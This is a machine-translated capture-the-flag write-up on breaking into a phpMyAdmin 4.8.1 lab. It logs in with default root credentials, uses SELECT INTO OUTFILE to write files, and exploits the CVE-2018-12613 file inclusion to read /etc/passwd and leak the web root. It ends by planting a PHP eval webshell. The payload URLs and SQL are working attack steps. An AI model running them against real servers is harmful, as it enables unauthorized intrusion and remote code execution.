Moher college phpMyAdmin background file contains analysis traceability

First, get the title and click to visit

Log in with a weak password after access , If login fails, open the privacy mode or change the browser

Account password ：root   root

Click on sql modular Yes sql Statement to make a query

First query sql Permission to write a sentence

We can see that its value is empty

secure-file-priv Parameters are used to limit LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE() To which specified directory .

show global VARIABLES like '%secure%' 

Keep looking at mysql The absolute path of the installation , It can be found that it is installed in /var/lib/mysql/

show VARIABLES like 'datadir' 

Next, make sure mysql jurisdiction , You can see that here is the highest authority root

SELECT USER();

  After you have the permission and absolute path, you can write a sentence directly , Try it first phpinfo

select '<?php phpinfo(); ?>' into outfile '/var/lib/mysql/test.php';

When it is written in, the access fails , After thinking for a long time, I found that this is mysql The path of , Not the absolute path of the website

Continue to find ways to get the absolute path of the website   According to the title, we can write a phpinfo, Through the absolute path of leakage shell, Ideas have , Direct drying

First, determine the database version , The version is 4.8.1. The number contained in the file is CVE-2018-12613

  Direct use of payload Just include it

http://124.70.71.251:40917/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

First write a phpinfo Enter database

select '<?php phpinfo();?>';

Then call through File Inclusion phpinfo

First of all get session Value , In the construction parameters to access phpinfo, Get absolute path

http://124.70.71.251:45548/index.phpindex.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_[value]

With an absolute path, you can write webshell 了 , Access directly after writing 1.php

select "<?php @eval($_POST['cmd']) ?>" into outfile "/var/www/html/1.php";

  Use the management tool to log in and go directly to the root key.txt  perhaps find / -name key.txt